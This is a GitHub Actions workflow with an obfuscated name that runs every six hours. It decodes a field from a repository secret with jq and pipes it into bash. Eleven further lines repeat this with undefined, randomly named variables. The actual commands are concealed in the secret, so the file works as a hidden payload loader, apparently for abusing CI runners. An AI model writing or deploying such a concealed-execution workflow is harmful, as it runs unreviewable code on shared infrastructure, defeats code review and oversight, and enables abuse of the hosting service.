name: lixiangyang3456

on:
  workflow_dispatch:
  schedule:
    - cron: '54 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: lixiangyang3456
        env:
          rvdo5001: ${{ secrets.rvdo5001 }}
        run: |
          echo $rvdo5001 | jq -r .ov329 | /bin/bash
          echo $f14394 | jq -r .ujo87349 | /bin/bash
          echo $khq5100 | jq -r .sj77962 | /bin/bash
          echo $oyr21 | jq -r .uqu44180 | /bin/bash
          echo $gus6 | jq -r .byg8602 | /bin/bash
          echo $cbrfg5 | jq -r .xicp331 | /bin/bash
          echo $ouotp84448 | jq -r .t6172 | /bin/bash
          echo $tlcmo018 | jq -r .uywq145 | /bin/bash
          echo $pmpy385 | jq -r .yhri2 | /bin/bash
          echo $umps0 | jq -r .g74982 | /bin/bash
          echo $zje83 | jq -r .ds5 | /bin/bash
          echo $i412 | jq -r .pmen0907 | /bin/bash

